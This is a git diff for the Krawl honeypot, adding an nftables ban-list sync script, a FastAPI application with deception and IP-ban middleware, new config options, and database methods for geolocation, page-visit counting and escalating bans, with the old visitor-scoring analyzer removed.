+ +curl -s https://your-krawl-instance/your-dashboard-path/api/get_banlist?fwtype=iptables > /tmp/ips_to_ban.txt + + +sudo nft add set inet filter krawl_ban { type ipv4_addr \; } 2>/dev/null || true + + +while read -r ip; do + [[ -z "$ip" ]] && continue + sudo nft add element inet filter krawl_ban { "$ip" } +done < /tmp/ips_to_ban.txt + + +sudo nft add rule inet filter input ip saddr @krawl_ban counter drop 2>/dev/null || true + + +rm -f /tmp/ips_to_ban.txt +``` + +Make it executable: +```bash +sudo chmod +x ./krawl-nftables.sh +``` + +### 2. Test the Script + +```bash +sudo ./krawl-nftables.sh +``` + +### 3. Schedule with Cron + +Edit root crontab: +```bash +sudo crontab -e +``` + +Add this line to sync IPs every hour: + +```bash +0 * * * * /path/to/krawl-nftables.sh +``` + +## Monitoring + +### Check the Blocking Set + +View blocked IPs: +```bash +sudo nft list set inet filter krawl_ban +``` + +Count blocked IPs: +```bash +sudo nft list set inet filter krawl_ban | grep "elements" | wc -w +``` + +### Check Active Rules + +View all rules in the filter table: +```bash +sudo nft list table inet filter +``` + +Find Krawl-specific rules: +```bash +sudo nft list chain inet filter input | grep krawl_ban +``` + +### Monitor in Real-Time + +Watch packets being dropped: +```bash +sudo nft list set inet filter krawl_ban -a +``` + +## Management Commands + +### Manually Block an IP + +```bash +sudo nft add element inet filter krawl_ban { 192.168.1.100 } +``` + +### Manually Unblock an IP + +```bash +sudo nft delete element inet filter krawl_ban { 192.168.1.100 } +``` + +### List All Blocked IPs + +```bash +sudo nft list set inet filter krawl_ban +``` + +### Clear All Blocked IPs + +```bash +sudo nft flush set inet filter krawl_ban +``` + +### Delete the Rule + +```bash +sudo nft delete rule inet filter input handle +``` + +## References + +- [Nftables Official Documentation](https://wiki.nftables.org/) +- [Nftables Quick Reference](https://wiki.nftables.org/wiki-nftables/index.php/Quick_reference-nftables_in_10_minutes) +- [Linux Kernel Netfilter Guide](https://www.kernel.org/doc/html/latest/networking/netfilter/) +- [Nftables Man Page](https://man.archlinux.org/man/nft.8) diff --git a/plugins/nftables/krawl-nftables.sh b/plugins/nftables/krawl-nftables.sh new file mode 100644 index 0000000..cebbe9a --- /dev/null +++ b/plugins/nftables/krawl-nftables.sh @@ -0,0 +1,19 @@ +#!/bin/bash + +# Fetch malicious IPs to temporary file +curl -s https://your-krawl-instance/your-dashboard-path/api/get_banlist?fwtype=iptables > /tmp/ips_to_ban.txt + +# Create the set if it doesn't exist +sudo nft add set inet filter krawl_ban { type ipv4_addr \; } 2>/dev/null || true + +# Add IPs to the set +while read -r ip; do + [[ -z "$ip" ]] && continue + sudo nft add element inet filter krawl_ban { "$ip" } +done < /tmp/ips_to_ban.txt + +# Create the rule if it doesn't exist +sudo nft add rule inet filter input ip saddr @krawl_ban counter drop 2>/dev/null || true + +# Cleanup +rm -f /tmp/ips_to_ban.txt \ No newline at end of file diff --git a/requirements.txt b/requirements.txt index b3f9b03..56dc4d4 100644 --- a/requirements.txt +++ b/requirements.txt @@ -11,3 +11,9 @@ SQLAlchemy>=2.0.0,<3.0.0 APScheduler>=3.11.2 requests>=2.32.5 + +# Web framework +fastapi>=0.115.0 +uvicorn[standard]>=0.30.0 +jinja2>=3.1.5 +python-multipart>=0.0.9 \ No newline at end of file diff --git a/src/analyzer.py b/src/analyzer.py deleted file mode 100644 index 7f29662..0000000 --- a/src/analyzer.py +++ /dev/null @@ -1,342 +0,0 @@ -#!/usr/bin/env python3 -from sqlalchemy import select -from typing import Optional -from database import get_database, DatabaseManager -from zoneinfo import ZoneInfo -from pathlib import Path -from datetime import datetime, timedelta -import re -import urllib.parse -from wordlists import get_wordlists -from config import get_config -from logger import get_app_logger -import requests - -""" -Functions for user activity analysis -""" - -app_logger = get_app_logger() - - -class Analyzer: - """ - Analyzes users activity and produces aggregated insights - """ - - def __init__(self, db_manager: Optional[DatabaseManager] = None): - """ - Initialize the analyzer. - - Args: - db_manager: Optional DatabaseManager for persistence. - If None, will use the global singleton. - """ - self._db_manager = db_manager - - @property - def db(self) -> Optional[DatabaseManager]: - """ - Get the database manager, lazily initializing if needed. - - Returns: - DatabaseManager instance or None if not available - """ - if self._db_manager is None: - try: - self._db_manager = get_database() - except Exception: - pass - return self._db_manager - - # def infer_user_category(self, ip: str) -> str: - - # config = get_config() - - # http_risky_methods_threshold = config.http_risky_methods_threshold - # violated_robots_threshold = config.violated_robots_threshold - # uneven_request_timing_threshold = config.uneven_request_timing_threshold - # user_agents_used_threshold = config.user_agents_used_threshold - # attack_urls_threshold = config.attack_urls_threshold - # uneven_request_timing_time_window_seconds = config.uneven_request_timing_time_window_seconds - - # app_logger.debug(f"http_risky_methods_threshold: {http_risky_methods_threshold}") - - # score = {} - # score["attacker"] = {"risky_http_methods": False, "robots_violations": False, "uneven_request_timing": False, "different_user_agents": False, "attack_url": False} - # score["good_crawler"] = {"risky_http_methods": False, "robots_violations": False, "uneven_request_timing": False, "different_user_agents": False, "attack_url": False} - # score["bad_crawler"] = {"risky_http_methods": False, "robots_violations": False, "uneven_request_timing": False, "different_user_agents": False, "attack_url": False} - # score["regular_user"] = {"risky_http_methods": False, "robots_violations": False, "uneven_request_timing": False, "different_user_agents": False, "attack_url": False} - - # #1-3 low, 4-6 mid, 7-9 high, 10-20 extreme - # weights = { - # "attacker": { - # "risky_http_methods": 6, - # "robots_violations": 4, - # "uneven_request_timing": 3, - # "different_user_agents": 8, - # "attack_url": 15 - # }, - # "good_crawler": { - # "risky_http_methods": 1, - # "robots_violations": 0, - # "uneven_request_timing": 0, - # "different_user_agents": 0, - # "attack_url": 0 - # }, - # "bad_crawler": { - # "risky_http_methods": 2, - # "robots_violations": 7, - # "uneven_request_timing": 0, - # "different_user_agents": 5, - # "attack_url": 5 - # }, - # "regular_user": { - # "risky_http_methods": 0, - # "robots_violations": 0, - # "uneven_request_timing": 8, - # "different_user_agents": 3, - # "attack_url": 0 - # } - # } - - # accesses = self.db.get_access_logs(ip_filter = ip, limit=1000) - # total_accesses_count = len(accesses) - # if total_accesses_count <= 0: - # return - - # # Set category as "unknown" for the first 5 requests - # if total_accesses_count < 3: - # category = "unknown" - # analyzed_metrics = {} - # category_scores = {"attacker": 0, "good_crawler": 0, "bad_crawler": 0, "regular_user": 0, "unknown": 0} - # last_analysis = datetime.now(tz=ZoneInfo('UTC')) - # self._db_manager.update_ip_stats_analysis(ip, analyzed_metrics, category, category_scores, last_analysis) - # return 0 - - # #--------------------- HTTP Methods --------------------- - - # get_accesses_count = len([item for item in accesses if item["method"] == "GET"]) - # post_accesses_count = len([item for item in accesses if item["method"] == "POST"]) - # put_accesses_count = len([item for item in accesses if item["method"] == "PUT"]) - # delete_accesses_count = len([item for item in accesses if item["method"] == "DELETE"]) - # head_accesses_count = len([item for item in accesses if item["method"] == "HEAD"]) - # options_accesses_count = len([item for item in accesses if item["method"] == "OPTIONS"]) - # patch_accesses_count = len([item for item in accesses if item["method"] == "PATCH"]) - - # if total_accesses_count > http_risky_methods_threshold: - # http_method_attacker_score = (post_accesses_count + put_accesses_count + delete_accesses_count + options_accesses_count + patch_accesses_count) / total_accesses_count - # else: - # http_method_attacker_score = 0 - - # #print(f"HTTP Method attacker score: {http_method_attacker_score}") - # if http_method_attacker_score >= http_risky_methods_threshold: - # score["attacker"]["risky_http_methods"] = True - # score["good_crawler"]["risky_http_methods"] = False - # score["bad_crawler"]["risky_http_methods"] = True - # score["regular_user"]["risky_http_methods"] = False - # else: - # score["attacker"]["risky_http_methods"] = False - # score["good_crawler"]["risky_http_methods"] = True - # score["bad_crawler"]["risky_http_methods"] = False - # score["regular_user"]["risky_http_methods"] = False - - # #--------------------- Robots Violations --------------------- - # #respect robots.txt and login/config pages access frequency - # robots_disallows = [] - # robots_path = Path(__file__).parent / "templates" / "html" / "robots.txt" - # with open(robots_path, "r") as f: - # for line in f: - # line = line.strip() - # if not line: - # continue - # parts = line.split(":") - - # if parts[0] == "Disallow": - # parts[1] = parts[1].rstrip("/") - # #print(f"DISALLOW {parts[1]}") - # robots_disallows.append(parts[1].strip()) - - # #if 0 100% sure is good crawler, if >10% of robots violated is bad crawler or attacker - # violated_robots_count = len([item for item in accesses if any(item["path"].rstrip("/").startswith(disallow) for disallow in robots_disallows)]) - # #print(f"Violated robots count: {violated_robots_count}") - # if total_accesses_count > 0: - # violated_robots_ratio = violated_robots_count / total_accesses_count - # else: - # violated_robots_ratio = 0 - - # if violated_robots_ratio >= violated_robots_threshold: - # score["attacker"]["robots_violations"] = True - # score["good_crawler"]["robots_violations"] = False - # score["bad_crawler"]["robots_violations"] = True - # score["regular_user"]["robots_violations"] = False - # else: - # score["attacker"]["robots_violations"] = False - # score["good_crawler"]["robots_violations"] = False - # score["bad_crawler"]["robots_violations"] = False - # score["regular_user"]["robots_violations"] = False - - # #--------------------- Requests Timing --------------------- - # #Request rate and timing: steady, throttled, polite vs attackers' bursty, aggressive, or oddly rhythmic behavior - # timestamps = [datetime.fromisoformat(item["timestamp"]) for item in accesses] - # now_utc = datetime.now(tz=ZoneInfo('UTC')) - # timestamps = [ts for ts in timestamps if now_utc - ts <= timedelta(seconds=uneven_request_timing_time_window_seconds)] - # timestamps = sorted(timestamps, reverse=True) - - # time_diffs = [] - # for i in range(0, len(timestamps)-1): - # diff = (timestamps[i] - timestamps[i+1]).total_seconds() - # time_diffs.append(diff) - - # mean = 0 - # variance = 0 - # std = 0 - # cv = 0 - # if time_diffs: - # mean = sum(time_diffs) / len(time_diffs) - # variance = sum((x - mean) ** 2 for x in time_diffs) / len(time_diffs) - # std = variance ** 0.5 - # cv = std/mean - # app_logger.debug(f"Mean: {mean} - Variance {variance} - Standard Deviation {std} - Coefficient of Variation: {cv}") - - # if cv >= uneven_request_timing_threshold: - # score["attacker"]["uneven_request_timing"] = True - # score["good_crawler"]["uneven_request_timing"] = False - # score["bad_crawler"]["uneven_request_timing"] = False - # score["regular_user"]["uneven_request_timing"] = True - # else: - # score["attacker"]["uneven_request_timing"] = False - # score["good_crawler"]["uneven_request_timing"] = False - # score["bad_crawler"]["uneven_request_timing"] = False - # score["regular_user"]["uneven_request_timing"] = False - - # #--------------------- Different User Agents --------------------- - # #Header Quality and Consistency: Crawlers tend to use complete and consistent headers, attackers might miss, fake, or change headers - # user_agents_used = [item["user_agent"] for item in accesses] - # user_agents_used = list(dict.fromkeys(user_agents_used)) - # #print(f"User agents used: {user_agents_used}") - - # if len(user_agents_used) >= user_agents_used_threshold: - # score["attacker"]["different_user_agents"] = True - # score["good_crawler"]["different_user_agents"] = False - # score["bad_crawler"]["different_user_agentss"] = True - # score["regular_user"]["different_user_agents"] = False - # else: - # score["attacker"]["different_user_agents"] = False - # score["good_crawler"]["different_user_agents"] = False - # score["bad_crawler"]["different_user_agents"] = False - # score["regular_user"]["different_user_agents"] = False - - # #--------------------- Attack URLs --------------------- - - # attack_urls_found_list = [] - - # wl = get_wordlists() - # if wl.attack_patterns: - # queried_paths = [item["path"] for item in accesses] - - # for queried_path in queried_paths: - # # URL decode the path to catch encoded attacks - # try: - # decoded_path = urllib.parse.unquote(queried_path) - # # Double decode to catch double-encoded attacks - # decoded_path_twice = urllib.parse.unquote(decoded_path) - # except Exception: - # decoded_path = queried_path - # decoded_path_twice = queried_path - - # for name, pattern in wl.attack_patterns.items(): - # # Check original, decoded, and double-decoded paths - # if (re.search(pattern, queried_path, re.IGNORECASE) or - # re.search(pattern, decoded_path, re.IGNORECASE) or - # re.search(pattern, decoded_path_twice, re.IGNORECASE)): - # attack_urls_found_list.append(f"{name}: {pattern}") - - # #remove duplicates - # attack_urls_found_list = set(attack_urls_found_list) - # attack_urls_found_list = list(attack_urls_found_list) - - # if len(attack_urls_found_list) > attack_urls_threshold: - # score["attacker"]["attack_url"] = True - # score["good_crawler"]["attack_url"] = False - # score["bad_crawler"]["attack_url"] = False - # score["regular_user"]["attack_url"] = False - # else: - # score["attacker"]["attack_url"] = False - # score["good_crawler"]["attack_url"] = False - # score["bad_crawler"]["attack_url"] = False - # score["regular_user"]["attack_url"] = False - - # #--------------------- Calculate score --------------------- - - # attacker_score = good_crawler_score = bad_crawler_score = regular_user_score = 0 - - # attacker_score = score["attacker"]["risky_http_methods"] * weights["attacker"]["risky_http_methods"] - # attacker_score = attacker_score + score["attacker"]["robots_violations"] * weights["attacker"]["robots_violations"] - # attacker_score = attacker_score + score["attacker"]["uneven_request_timing"] * weights["attacker"]["uneven_request_timing"] - # attacker_score = attacker_score + score["attacker"]["different_user_agents"] * weights["attacker"]["different_user_agents"] - # attacker_score = attacker_score + score["attacker"]["attack_url"] * weights["attacker"]["attack_url"] - - # good_crawler_score = score["good_crawler"]["risky_http_methods"] * weights["good_crawler"]["risky_http_methods"] - # good_crawler_score = good_crawler_score + score["good_crawler"]["robots_violations"] * weights["good_crawler"]["robots_violations"] - # good_crawler_score = good_crawler_score + score["good_crawler"]["uneven_request_timing"] * weights["good_crawler"]["uneven_request_timing"] - # good_crawler_score = good_crawler_score + score["good_crawler"]["different_user_agents"] * weights["good_crawler"]["different_user_agents"] - # good_crawler_score = good_crawler_score + score["good_crawler"]["attack_url"] * weights["good_crawler"]["attack_url"] - - # bad_crawler_score = score["bad_crawler"]["risky_http_methods"] * weights["bad_crawler"]["risky_http_methods"] - # bad_crawler_score = bad_crawler_score + score["bad_crawler"]["robots_violations"] * weights["bad_crawler"]["robots_violations"] - # bad_crawler_score = bad_crawler_score + score["bad_crawler"]["uneven_request_timing"] * weights["bad_crawler"]["uneven_request_timing"] - # bad_crawler_score = bad_crawler_score + score["bad_crawler"]["different_user_agents"] * weights["bad_crawler"]["different_user_agents"] - # bad_crawler_score = bad_crawler_score + score["bad_crawler"]["attack_url"] * weights["bad_crawler"]["attack_url"] - - # regular_user_score = score["regular_user"]["risky_http_methods"] * weights["regular_user"]["risky_http_methods"] - # regular_user_score = regular_user_score + score["regular_user"]["robots_violations"] * weights["regular_user"]["robots_violations"] - # regular_user_score = regular_user_score + score["regular_user"]["uneven_request_timing"] * weights["regular_user"]["uneven_request_timing"] - # regular_user_score = regular_user_score + score["regular_user"]["different_user_agents"] * weights["regular_user"]["different_user_agents"] - # regular_user_score = regular_user_score + score["regular_user"]["attack_url"] * weights["regular_user"]["attack_url"] - - # score_details = f""" - # Attacker score: {attacker_score} - # Good Crawler score: {good_crawler_score} - # Bad Crawler score: {bad_crawler_score} - # Regular User score: {regular_user_score} - # """ - # app_logger.debug(score_details) - - # analyzed_metrics = {"risky_http_methods": http_method_attacker_score, "robots_violations": violated_robots_ratio, "uneven_request_timing": mean, "different_user_agents": user_agents_used, "attack_url": attack_urls_found_list} - # category_scores = {"attacker": attacker_score, "good_crawler": good_crawler_score, "bad_crawler": bad_crawler_score, "regular_user": regular_user_score} - # category = max(category_scores, key=category_scores.get) - # last_analysis = datetime.now(tz=ZoneInfo('UTC')) - - # self._db_manager.update_ip_stats_analysis(ip, analyzed_metrics, category, category_scores, last_analysis) - - # return 0 - - # def update_ip_rep_infos(self, ip: str) -> list[str]: - # api_url = "https://iprep.lcrawl.com/api/iprep/" - # params = { - # "cidr": ip - # } - # headers = { - # "Content-Type": "application/json" - # } - - # response = requests.get(api_url, headers=headers, params=params) - # payload = response.json() - - # if payload["results"]: - # data = payload["results"][0] - - # country_iso_code = data["geoip_data"]["country_iso_code"] - # asn = data["geoip_data"]["asn_autonomous_system_number"] - # asn_org = data["geoip_data"]["asn_autonomous_system_organization"] - # list_on = data["list_on"] - - # sanitized_country_iso_code = sanitize_for_storage(country_iso_code, 3) - # sanitized_asn = sanitize_for_storage(asn, 100) - # sanitized_asn_org = sanitize_for_storage(asn_org, 100) - # sanitized_list_on = sanitize_dict(list_on, 100000) - - # self._db_manager.update_ip_rep_infos(ip, sanitized_country_iso_code, sanitized_asn, sanitized_asn_org, sanitized_list_on) - - # return diff --git a/src/app.py b/src/app.py new file mode 100644 index 0000000..2b2df92 --- /dev/null +++ b/src/app.py @@ -0,0 +1,151 @@ +#!/usr/bin/env python3 + +""" +FastAPI application factory for the Krawl honeypot. +Replaces the old http.server-based server.py. +""" + +import sys +import os +from contextlib import asynccontextmanager + +from fastapi import FastAPI, Request, Response +from fastapi.staticfiles import StaticFiles + +from config import get_config +from tracker import AccessTracker, set_tracker +from database import initialize_database +from tasks_master import get_tasksmaster +from logger import initialize_logging, get_app_logger +from generators import random_server_header + + +@asynccontextmanager +async def lifespan(app: FastAPI): + """Application startup and shutdown lifecycle.""" + config = get_config() + + # Initialize logging + initialize_logging(log_level=config.log_level) + app_logger = get_app_logger() + + # Initialize database and run pending migrations before accepting traffic + try: + app_logger.info(f"Initializing database at: {config.database_path}") + initialize_database(config.database_path) + app_logger.info("Database ready") + except Exception as e: + app_logger.warning( + f"Database initialization failed: {e}. Continuing with in-memory only." + ) + + # Initialize tracker + tracker = AccessTracker(config.max_pages_limit, config.ban_duration_seconds) + set_tracker(tracker) + + # Store in app.state for dependency injection + app.state.config = config + app.state.tracker = tracker + + # Load webpages file if provided via env var + webpages = None + webpages_file = os.environ.get("KRAWL_WEBPAGES_FILE") + if webpages_file: + try: + with open(webpages_file, "r") as f: + webpages = f.readlines() + if not webpages: + app_logger.warning( + "The webpages file was empty. Using randomly generated links." + ) + webpages = None + except IOError: + app_logger.warning( + "Can't read webpages file. Using randomly generated links." + ) + app.state.webpages = webpages + + # Initialize canary counter + app.state.counter = config.canary_token_tries + + # Start scheduled tasks + tasks_master = get_tasksmaster() + tasks_master.run_scheduled_tasks() + + banner = f""" + +============================================================ +DASHBOARD AVAILABLE AT +{config.dashboard_secret_path} +============================================================ + """ + app_logger.info(banner) + app_logger.info(f"Starting deception server on port {config.port}...") + if config.canary_token_url: + app_logger.info( + f"Canary token will appear after {config.canary_token_tries} tries" + ) + else: + app_logger.info("No canary token configured (set CANARY_TOKEN_URL to enable)") + + yield + + # Shutdown + app_logger.info("Server shutting down...") + + +def create_app() -> FastAPI: + """Create and configure the FastAPI application.""" + application = FastAPI( + docs_url=None, + redoc_url=None, + openapi_url=None, + lifespan=lifespan, + ) + + # Random server header middleware (innermost — runs last on request, first on response) + @application.middleware("http") + async def server_header_middleware(request: Request, call_next): + response: Response = await call_next(request) + response.headers["Server"] = random_server_header() + return response + + # Deception detection middleware (path traversal, XXE, command injection) + from middleware.deception import DeceptionMiddleware + + application.add_middleware(DeceptionMiddleware) + + # Banned IP check middleware (outermost — runs first on request) + from middleware.ban_check import BanCheckMiddleware + + application.add_middleware(BanCheckMiddleware) + + # Mount static files for the dashboard + config = get_config() + secret = config.dashboard_secret_path.lstrip("/") + static_dir = os.path.join(os.path.dirname(__file__), "templates", "static") + application.mount( + f"/{secret}/static", + StaticFiles(directory=static_dir), + name="dashboard-static", + ) + + # Import and include routers + from routes.honeypot import router as honeypot_router + from routes.api import router as api_router + from routes.dashboard import router as dashboard_router + from routes.htmx import router as htmx_router + + # Dashboard/API/HTMX routes (prefixed with secret path, before honeypot catch-all) + dashboard_prefix = f"/{secret}" + application.include_router(dashboard_router, prefix=dashboard_prefix) + application.include_router(api_router, prefix=dashboard_prefix) + application.include_router(htmx_router, prefix=dashboard_prefix) + + # Honeypot routes (catch-all must be last) + application.include_router(honeypot_router) + + return application + + +app = create_app() diff --git a/src/config.py b/src/config.py index 3e5983f..cb46bf6 100644 --- a/src/config.py +++ b/src/config.py @@ -37,6 +37,13 @@ class Config: infinite_pages_for_malicious: bool = True # Infinite pages for malicious crawlers ban_duration_seconds: int = 600 # Ban duration in seconds for IPs exceeding limits + # exporter settings + exports_path: str = "exports" + + # backup job settings + backups_path: str = "backups" + backups_enabled: bool = False + backups_cron: str = "*/30 * * * *" # Database settings database_path: str = "data/krawl.db" database_retention_days: int = 30 @@ -49,6 +56,8 @@ class Config: user_agents_used_threshold: float = None attack_urls_threshold: float = None + log_level: str = "INFO" + _server_ip: Optional[str] = None _server_ip_cache_time: float = 0 _ip_cache_ttl: int = 300 @@ -85,7 +94,7 @@ class Config: ip = response.text.strip() if ip: break - except Exception: + except requests.RequestException: continue if not ip: @@ -150,10 +159,13 @@ class Config: canary = data.get("canary", {}) dashboard = data.get("dashboard", {}) api = data.get("api", {}) + exports = data.get("exports", {}) + backups = data.get("backups", {}) database = data.get("database", {}) behavior = data.get("behavior", {}) analyzer = data.get("analyzer") or {} crawl = data.get("crawl", {}) + logging_cfg = data.get("logging", {}) # Handle dashboard_secret_path - auto-generate if null/not set dashboard_path = dashboard.get("secret_path") @@ -185,6 +197,10 @@ class Config: canary_token_tries=canary.get("token_tries", 10), dashboard_secret_path=dashboard_path, probability_error_codes=behavior.get("probability_error_codes", 0), + exports_path=exports.get("path", "exports"), + backups_path=backups.get("path", "backups"), + backups_enabled=backups.get("enabled", False), + backups_cron=backups.get("cron"), database_path=database.get("path", "data/krawl.db"), database_retention_days=database.get("retention_days", 30), http_risky_methods_threshold=analyzer.get( @@ -204,6 +220,9 @@ class Config: ), max_pages_limit=crawl.get("max_pages_limit", 250), ban_duration_seconds=crawl.get("ban_duration_seconds", 600), + log_level=os.getenv( + "KRAWL_LOG_LEVEL", logging_cfg.get("level", "INFO") + ).upper(), ) diff --git a/src/database.py b/src/database.py index 36cc7e1..cbee4a0 100644 --- a/src/database.py +++ b/src/database.py @@ -97,6 +97,11 @@ class DatabaseManager: # Run automatic migrations for backward compatibility self._run_migrations(database_path) + # Run schema migrations (columns & indexes on existing tables) + from migrations.runner import run_migrations + + run_migrations(database_path) + # Set restrictive file permissions (owner read/write only) if os.path.exists(database_path): try: @@ -137,6 +142,41 @@ class DatabaseManager: cursor.execute("ALTER TABLE ip_stats ADD COLUMN longitude REAL") migrations_run.append("longitude") + # Add new geolocation columns + if "country" not in columns: + cursor.execute("ALTER TABLE ip_stats ADD COLUMN country VARCHAR(100)") + migrations_run.append("country") + + if "region" not in columns: + cursor.execute("ALTER TABLE ip_stats ADD COLUMN region VARCHAR(2)") + migrations_run.append("region") + + if "region_name" not in columns: + cursor.execute( + "ALTER TABLE ip_stats ADD COLUMN region_name VARCHAR(100)" + ) + migrations_run.append("region_name") + + if "timezone" not in columns: + cursor.execute("ALTER TABLE ip_stats ADD COLUMN timezone VARCHAR(50)") + migrations_run.append("timezone") + + if "isp" not in columns: + cursor.execute("ALTER TABLE ip_stats ADD COLUMN isp VARCHAR(100)") + migrations_run.append("isp") + + if "is_proxy" not in columns: + cursor.execute("ALTER TABLE ip_stats ADD COLUMN is_proxy BOOLEAN") + migrations_run.append("is_proxy") + + if "is_hosting" not in columns: + cursor.execute("ALTER TABLE ip_stats ADD COLUMN is_hosting BOOLEAN") + migrations_run.append("is_hosting") + + if "reverse" not in columns: + cursor.execute("ALTER TABLE ip_stats ADD COLUMN reverse VARCHAR(255)") + migrations_run.append("reverse") + if migrations_run: conn.commit() applogger.info( @@ -172,6 +212,7 @@ class DatabaseManager: is_honeypot_trigger: bool = False, attack_types: Optional[List[str]] = None, matched_patterns: Optional[Dict[str, str]] = None, + raw_request: Optional[str] = None, ) -> Optional[int]: """ Persist an access log entry to the database. @@ -185,6 +226,7 @@ class DatabaseManager: is_honeypot_trigger: Whether a honeypot path was accessed attack_types: List of detected attack types matched_patterns: Dict mapping attack_type to matched pattern + raw_request: Full raw HTTP request for forensic analysis Returns: The ID of the created AccessLog record, or None on error @@ -200,6 +242,7 @@ class DatabaseManager: is_suspicious=is_suspicious, is_honeypot_trigger=is_honeypot_trigger, timestamp=datetime.now(), + raw_request=raw_request, ) session.add(access_log) session.flush() # Get the ID before committing @@ -218,7 +261,7 @@ class DatabaseManager: session.add(detection) # Update IP stats - self._update_ip_stats(session, ip) + self._update_ip_stats(session, ip, is_suspicious) session.commit() return access_log.id @@ -270,13 +313,16 @@ class DatabaseManager: finally: self.close_session() - def _update_ip_stats(self, session: Session, ip: str) -> None: + def _update_ip_stats( + self, session: Session, ip: str, is_suspicious: bool = False + ) -> None: """ Update IP statistics (upsert pattern). Args: session: Active database session ip: IP address to update + is_suspicious: Whether the request was flagged as suspicious """ sanitized_ip = sanitize_ip(ip) now = datetime.now() @@ -286,12 +332,159 @@ class DatabaseManager: if ip_stats: ip_stats.total_requests += 1 ip_stats.last_seen = now + if is_suspicious: + ip_stats.need_reevaluation = True else: ip_stats = IpStats( - ip=sanitized_ip, total_requests=1, first_seen=now, last_seen=now + ip=sanitized_ip, + total_requests=1, + first_seen=now, + last_seen=now, + need_reevaluation=is_suspicious, ) session.add(ip_stats) + def increment_page_visit(self, ip: str, max_pages_limit: int) -> int: + """ + Increment the page visit counter for an IP and apply ban if limit reached. + + Args: + ip: Client IP address + max_pages_limit: Page visit threshold before banning + + Returns: + The updated page visit count + """ + session = self.session + try: + sanitized_ip = sanitize_ip(ip) + ip_stats = session.query(IpStats).filter(IpStats.ip == sanitized_ip).first() + + if not ip_stats: + now = datetime.now() + ip_stats = IpStats( + ip=sanitized_ip, + total_requests=0, + first_seen=now, + last_seen=now, + page_visit_count=1, + ) + session.add(ip_stats) + session.commit() + return 1 + + ip_stats.page_visit_count = (ip_stats.page_visit_count or 0) + 1 + + if ip_stats.page_visit_count >= max_pages_limit: + ip_stats.total_violations = (ip_stats.total_violations or 0) + 1 + ip_stats.ban_multiplier = 2 ** (ip_stats.total_violations - 1) + ip_stats.ban_timestamp = datetime.now() + + session.commit() + return ip_stats.page_visit_count + + except Exception as e: + session.rollback() + applogger.error(f"Error incrementing page visit for {ip}: {e}") + return 0 + finally: + self.close_session() + + def is_banned_ip(self, ip: str, ban_duration_seconds: int) -> bool: + """ + Check if an IP is currently banned. + + Args: + ip: Client IP address + ban_duration_seconds: Base ban duration in seconds + + Returns: + True if the IP is currently banned + """ + session = self.session + try: + sanitized_ip = sanitize_ip(ip) + ip_stats = session.query(IpStats).filter(IpStats.ip == sanitized_ip).first() + + if not ip_stats or ip_stats.ban_timestamp is None: + return False + + effective_duration = ban_duration_seconds * (ip_stats.ban_multiplier or 1) + elapsed = (datetime.now() - ip_stats.ban_timestamp).total_seconds() + + if elapsed > effective_duration: + # Ban expired — reset count for next cycle + ip_stats.page_visit_count = 0 + ip_stats.ban_timestamp = None + session.commit() + return False + + return True + + except Exception as e: + applogger.error(f"Error checking ban status for {ip}: {e}") + return False + finally: + self.close_session() + + def get_ban_info(self, ip: str, ban_duration_seconds: int) -> dict: + """ + Get detailed ban information for an IP. + + Args: + ip: Client IP address + ban_duration_seconds: Base ban duration in seconds + + Returns: + Dictionary with ban status details + """ + session = self.session + try: + sanitized_ip = sanitize_ip(ip) + ip_stats = session.query(IpStats).filter(IpStats.ip == sanitized_ip).first() + + if not ip_stats: + return { + "is_banned": False, + "violations": 0, + "ban_multiplier": 1, + "remaining_ban_seconds": 0, + } + + violations = ip_stats.total_violations or 0 + multiplier = ip_stats.ban_multiplier or 1 + + if ip_stats.ban_timestamp is None: + return { + "is_banned": False, + "violations": violations, + "ban_multiplier": multiplier, + "remaining_ban_seconds": 0, + } + + effective_duration = ban_duration_seconds * multiplier + elapsed = (datetime.now() - ip_stats.ban_timestamp).total_seconds() + remaining = max(0, effective_duration - elapsed) + + return { + "is_banned": remaining > 0, + "violations": violations, + "ban_multiplier": multiplier, + "effective_ban_duration_seconds": effective_duration, + "remaining_ban_seconds": remaining, + } + + except Exception as e: + applogger.error(f"Error getting ban info for {ip}: {e}") + return { + "is_banned": False, + "violations": 0, + "ban_multiplier": 1, + "remaining_ban_seconds": 0, + } + finally: + self.close_session() + def update_ip_stats_analysis( self, ip: str, @@ -321,6 +514,16 @@ class DatabaseManager: sanitized_ip = sanitize_ip(ip) ip_stats = session.query(IpStats).filter(IpStats.ip == sanitized_ip).first() + if not ip_stats: + applogger.warning( + f"No IpStats record found for {sanitized_ip}, creating one." + ) + now = datetime.now() + ip_stats = IpStats( + ip=sanitized_ip, total_requests=0, first_seen=now, last_seen=now + ) + session.add(ip_stats) + # Check if category has changed and record it old_category = ip_stats.category if old_category != category: @@ -332,6 +535,7 @@ class DatabaseManager: ip_stats.category = category ip_stats.category_scores = category_scores ip_stats.last_analysis = last_analysis + ip_stats.need_reevaluation = False try: session.commit() @@ -352,6 +556,10 @@ class DatabaseManager: sanitized_ip = sanitize_ip(ip) ip_stats = session.query(IpStats).filter(IpStats.ip == sanitized_ip).first() + if not ip_stats: + applogger.warning(f"No IpStats record found for {sanitized_ip}") + return + # Record the manual category change old_category = ip_stats.category if old_category != category: @@ -377,7 +585,7 @@ class DatabaseManager: ) -> None: """ Internal method to record category changes in history. - Only records if there's an actual change from a previous category. + Records all category changes including initial categorization. Args: ip: IP address @@ -385,11 +593,6 @@ class DatabaseManager: new_category: New category timestamp: When the change occurred """ - # Don't record initial categorization (when old_category is None) - # Only record actual category changes - if old_category is None: - return - session = self.session try: history_entry = CategoryHistory( @@ -445,6 +648,14 @@ class DatabaseManager: city: Optional[str] = None, latitude: Optional[float] = None, longitude: Optional[float] = None, + country: Optional[str] = None, + region: Optional[str] = None, + region_name: Optional[str] = None, + timezone: Optional[str] = None, + isp: Optional[str] = None, + reverse: Optional[str] = None, + is_proxy: Optional[bool] = None, + is_hosting: Optional[bool] = None, ) -> None: """ Update IP rep stats @@ -458,6 +669,14 @@ class DatabaseManager: city: City name (optional) latitude: Latitude coordinate (optional) longitude: Longitude coordinate (optional) + country: Full country name (optional) + region: Region code (optional) + region_name: Region name (optional) + timezone: Timezone (optional) + isp: Internet Service Provider (optional) + reverse: Reverse DNS lookup (optional) + is_proxy: Whether IP is a proxy (optional) + is_hosting: Whether IP is a hosting provider (optional) """ session = self.session @@ -475,6 +694,22 @@ class DatabaseManager: ip_stats.latitude = latitude if longitude is not None: ip_stats.longitude = longitude + if country: + ip_stats.country = country + if region: + ip_stats.region = region + if region_name: + ip_stats.region_name = region_name + if timezone: + ip_stats.timezone = timezone + if isp: + ip_stats.isp = isp + if 